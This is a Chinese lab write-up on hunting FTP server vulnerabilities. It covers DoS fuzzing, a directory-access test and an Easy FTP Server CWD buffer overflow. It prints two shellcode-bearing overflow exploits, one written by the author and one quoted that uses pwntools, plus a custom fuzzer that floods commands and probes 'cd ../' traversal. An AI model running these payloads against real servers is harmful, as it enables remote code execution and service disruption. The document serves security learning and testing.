FTP的漏洞挖掘
FTP协议简介
漏洞挖掘手记1:DoS
原理是对 FTP 协议中的命令及命令参数进行脏数据替换,构造畸形的 FTP 命令并发送给被测 FTP 服务程序。
下载了一个 FTPFuzz,界面丑绝人寰
开启Quick ‘n Easy FTP Server
开启后做实验,服务并没有崩溃,未能触发 DoS。可能和 SP3 有关。
漏洞挖掘手记2:访问权限
在WIN7中开启CompleteFTP Server
登录不了,新建个账户吧
FTP 目录在本地系统中的“/Home/user”
所以这就绕过了?
easyFTP 缓冲区溢出漏洞
Easy FTP Server 执行 CWD 时未对参数进行长度有效性校验,传递超长参数会造成缓冲区溢出。
启动easyFTP,开启后生成三个XML配置文件和一个文件夹
用 OD 附加到进程后,按 F9 继续运行
实验失败:
代码如下:
import socket import sys def ftp_test(ip,port): target = ip port = port shellcode = (‘\\x50\\x20‘ ‘\\xD9\\xEE‘ ‘\\xD9\\x74\\x24\\xF4‘ ‘\\x58‘ ‘\\x83\\xC0\\x1b‘ ‘\\x33\\xC9‘ ‘\\x8A\\x1C\\x08‘ ‘\\x80\\xF3\\x11‘ ‘\\x88\\x1C\\x08‘ ‘\\x41‘ ‘\\x80\\xFB\\x90‘ ‘\\x75\\xF1‘ ‘\\xed\\x79\\x7b\\x1b\\x29\\x0f\\x79\\x72\\x98\\xc0\\x5e\\x79\\x23\\x65\\x80\\x1d‘ ‘\\x9a\\xe5\\x9c\\x6f\\xe5\\x22\\xca\\xa6\\x15\\x3a\\xf2\\x77\\xaa\\x22\\x23\\x42‘ ‘\\x79\\x64\\x62\\x74\\x63\\x45\\x22\\xc3\\x75\\x9a\\x4b\\x21\\x9a\\x5a\\x1d\\x9a‘ ‘\\x58\\x0d\\x9a\\x18\\x9a\\x78\\x19\\xbc\\x2c\\x7b\\x1b\\x29\\x0f\\x64\\x14\\x84‘ ‘\\xee\\x46\\xe9\\x84\\x71\\x9a\\x54\\x2d\\x9a\\x5d\\x14\\x69\\x12\\xdc\\x9a\\x48‘ ‘\\x31\\x12\\xcc\\x22\\xee\\x56\\x9a\\x25\\xaa\\x12\\xe4\\x88\\x1e\\xaf\\x17\\x2b‘ ‘\\xd5\\x65\\x19\\xd0\\xdb\\x16\\x12\\xc1\\x57\\xfa\\xe0\\x2a\\x45\\x35\\x0d\\x64‘ ‘\\xf5\\x9a\\x48\\x35\\x12\\xcc\\x77\\x9a\\x2d\\x6a\\x9a\\x48\\x0d\\x12\\xcc\\x12‘ ‘\\x3d\\xaa\\x84\\x4e\\xba\\x46\\x70\\x2c\\x7b\\x1b\\x29\\x0f\\x64\\xb8\\x22\\xca‘ ‘\\x42\\x79\\x75\\x70\\x21\\x32\\x79\\x32\\x41\\x70\\x7f\\x9a\\xd5\\x42\\x41\\x41‘ ‘\\x42\\xee\\x46\\xed\\x42\\xee\\x46\\xe9\\x81‘) buffer = shellcode+‘a‘*(268-198)+‘\\xa0\\x6f\\x5f\\x7d‘ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target,port)) print "[+] Connected!" except: print "[!] Connection failed!" sys.exit(0) s.recv(1024) s.send(‘USER anonymouss\\r\\n‘) s.recv(1024) s.send(‘PASS anonymous\\r\\n‘) s.recv(1024) print "[+] Sending buffer..." s.send(‘CWD‘ + buffer + ‘\\r\\n‘) try: s.recv(1024) print "failed" except: print "ok" s.close() if __name__ == ‘__main__‘: ftp_test("192.168.211.129", 21)
转去网上搜索别人的代码,他人代码用到的是 pwntools 包,在 Windows 上安装不了,我笑了。呵呵哒。此处贴上他人的利用代码
from pwn import * p = remote("192.168.253.156", 21) jmp_esp = 0x7E429353 shellcode = "\\x33\\xDB\\x53\\x68\\x6E\\x63\\x68\\x21\\x68\\x74\\x62\\x72\\x61\\x68\\x67\\x69\\x61\\x6E\\x8B\\xC4\\x53\\x50\\x50\\x53\\xB8\\xEA\\x07\\x45\\x7E\\xFF\\xD0" nop = "\\x90" * 12 payload = ‘a‘ * 268 + p32(jmp_esp) + nop + shellcode print p.recv(1024) p.sendline("USER anonymous") print p.recv(1024) p.sendline("PASS anonymous") print p.recv(1024) p.sendline("CWD " + payload) p.interactive()
Fuzz DIY
# -*- coding: utf-8 -*- # @Date : 2017-02-19 21:44:12 # @Author : giantbranch ([email protected]) # @Link : http://blog.csdn.net/u012763794?viewmode=contents # @Link : http://www.giantbranch.cn/ import sys import socket buffer = ‘a‘ * 4 fuzzcmd = [‘mdelete‘, ‘cd‘, ‘mkdir‘, ‘delete‘, ‘cwd‘, ‘mdir‘, ‘mput‘, ‘mls‘, ‘rename‘, ‘site index‘ ] if len(sys.argv) != 4: print "[*] Please input like this: python fuzzFtp.py 192.168.253.151 21 1" sys.exit(0) target = sys.argv[1] port = int(sys.argv[2]) mode = int(sys.argv[3]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print target print port con = s.connect((target, port)) print "[*] Connected!" except: print "[*] Connect failed!" sys.exit(0) # 接受欢迎信息 s.recv(1024) s.send("USER anonymous\\r\\n") s.recv(1024) s.send("PASS anonymous\\r\\n") s.recv(1024) j = 100 if mode ==1: print "[*] Sending payload..." for i in fuzzcmd: s.send(i + ‘ ‘ + buffer*j + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer*j*4 + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer*j*8 + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer*j*40 + ‘\\r\\n‘) s.send(i + ‘ ‘ + buffer + ‘ ‘ + buffer + ‘\\r\\n‘) try: s.recv(1024) print "[!] WuWu, Failed!" except : print "[+] Yeah! Maybe you find a Bug!" if mode == 2: s.send(‘cd ../\\r\\n‘) ds = s.recv(50).find("550") if ds != -1: print "[+] Yeah! Maybe you can cd ../!" if mode == 2: s.send(‘cd ..\\\\r\\n‘) dss = s.recv(50).find("550") if dss != -1: print "[+] Yeah! Maybe you can cd ..\\!"
运行完毕,服务端特别卡
未成功